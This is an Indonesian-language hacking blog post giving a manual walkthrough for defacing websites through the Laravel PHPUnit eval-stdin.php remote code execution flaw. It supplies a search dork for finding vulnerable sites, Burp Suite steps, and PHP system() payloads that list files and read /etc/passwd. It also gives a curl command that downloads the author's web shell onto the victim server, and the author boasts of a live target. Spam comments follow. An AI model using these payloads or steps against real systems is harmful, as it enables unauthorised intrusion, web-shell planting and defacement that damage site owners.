Loading...

Deface POC Laravel PHP Unit Manual




Assalamu'alaikum Warahmatullahi Wabarakaatuh

Oke kali ini gw prizeHdru akan membahas tehnik depes yg katanya lg booming, yaa jujur aja gw baru tau tadi grgr nanya sama si Mr.L3rbi :v
Setelah beberapa kali gagal, akhirnya gw nemu yg vuln dan cocok buat di tusbool.

Langsung aja..
Alat dan bahan :

-pc
-browser (pastinya)
-burpsuite (google banyak asw)
-kopi
-rokok
-dan yg paling penting adalah kesantuy an yg hqq


Nb: sebenarnya ada tools auto exploitnya, cuman kalo make tools doang tanpa ngerti cara kerjanya sama aja NOL. Kalo mau cari toolsnya cari aja digoogle bnyk.


Ok pertama dorking dulu :
inurl:/phpunit/phpunit/ intitle:"index of" site:.com

Exploit: /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
Titik Vuln : /eval-stdin.php

  
Gw udh ada live targetnya :p


1. Vuln apa tidaknya ditandai dgn ngeblank/warna putih doang, liat gambar



2. Masuk pengaturan browser, ubah network koneksinya jadi manual dgn proxy 127.0.0.1 dan portnya 8080 buat nanti di sambungkan dgn burpsuite




3. Buka burpsuite, masuk ke proxy dan tekan intereceptnya biar on, lihat gambar




4. Kembali ke browser dan reload web yg vuln tadi, ini agar si burpsuite bisa membaca anunya web tsb :v. Liat icon burpsuitenya di bawah akan berwarna orange apabila dia berhasil membaca




5. Lihat gambar, nanti akan muncul kek gitu. Selanjutnya klik kanan dan Send to Repeater jangan lupa matikan interecept kalo udah di send ke repeater


6. Next masuk ke repeater, lihat kolom kiri adalah requestnya dan responsnya berada di sebelah kanan.
Masukkan payload <?php system('ls');?> di kolom request, gunanya agar melihat isi dalam dir /PHP/ atau bisa juga dengan
<?php system('tail /etc/passwd');?> 
terus klik send.. Nanti kalo bisa di tusbool bakal muncul responsnya disebelah kanan, lihat gambar. Kalo gamuncul berarti gbs di tusbool.





7. Langsung aja kita tusbool gan dgn perintah curl buat manggil shell kita <?php system('curl (link shell elu) -o x.php');?>

Nb: x.php itu nama shell yg akan kalian kirim ke web tsb, nantinya terserah elulah mo pake nama apa



8. Kalo udah, sekarang kita cek lagi apakah shell kita udah terupload apa belum, perintahnya sama kek yg pertama <?php system('ls');?> atau bisa juga <?php system('ls -la');?> 

Noh dah muncul shell gw :p


8. Terakhir tinggal akses aja shell kalian. Caranya? Hapus eval-stdin.php ganti jadi nama shell lu..




Thanks to :
. /sT0ry_mB3m
Mr.L3rbi
M.A
--------------


Referensi:
https://exploit.linuxsec.org/laravel-phpunit-remote-code-execution/
https://www.exploitkita.org/2019/06/tools-laravel-framework-phpunit-rce.html?m=1
https://blog.n45ht.web.id/2019/07/phpunit-autoexploiterrce.html?m=1

~prizeHdru
Loading...

Related Posts

6 Responses to "Deface POC Laravel PHP Unit Manual"

  1. Great post, and great website. Thanks for the information! Why Do I Smell Gas Coming From My Oven?

    ReplyDelete
  2. I love this blog!! The flash up the top is awesome!! San Diego web design

    ReplyDelete
  3. The speed at which your site loads is very important. Firstly, a fast loading site will have your readers stick around longer. Joomla Web Support

    ReplyDelete
  4. Love to read it,Waiting For More new Update and I Already Read your Recent Post its Great Thanks. credit care

    ReplyDelete
  5. Really I enjoy your site with effective and useful information. It is included very nice post with a lot of our resources.thanks for share. i enjoy this post. British Airport Transfers London Airports

    ReplyDelete
  6. Really I enjoy your site with effective and useful information. It is included very nice post with a lot of our resources.thanks for share. i enjoy this post
    online urgent care

    ReplyDelete

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel